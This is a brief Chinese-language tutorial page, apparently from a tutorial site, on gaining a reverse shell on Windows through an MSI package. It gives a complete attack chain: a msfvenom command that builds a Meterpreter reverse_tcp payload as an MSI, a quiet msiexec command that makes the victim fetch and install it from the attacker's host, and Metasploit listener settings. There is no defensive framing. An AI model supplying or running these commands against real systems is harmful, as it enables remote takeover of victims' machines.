使用 MSI 軟體包獲取反向 Shell


Windows 作業系統已安裝 Windows 安裝程式引擎,MSI 軟體包使用此引擎來安裝應用程式。解釋軟體包和安裝產品的可執行程式是 Msiexec.exe。

透過 msfvenom 啟動 msiexec 攻擊

讓我們使用 Windows Meterpreter 載荷生成一個 MSI 軟體包檔案 (1.msi),如下所示;

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

在目標端,當受害者在遠端計算機上執行 1.msi 檔案時,使用以下實用程式;

msiexec /q /i http://192.168.1.109/1.msi

攻擊者透過啟動 multi/handler 作為監聽器,從而獲得受害者計算機的反向 shell。

  • use exploit/multi/handler
  • set pyaload windows/meterpreter/reverse_tcp
  • set lhost 192.168.1.109
  • exploit

更新於: 2020 年 9 月 23 日

2K+ 瀏覽

開啟你的 職業生涯

完成課程即可獲得認證

開始使用
廣告
© . All rights reserved.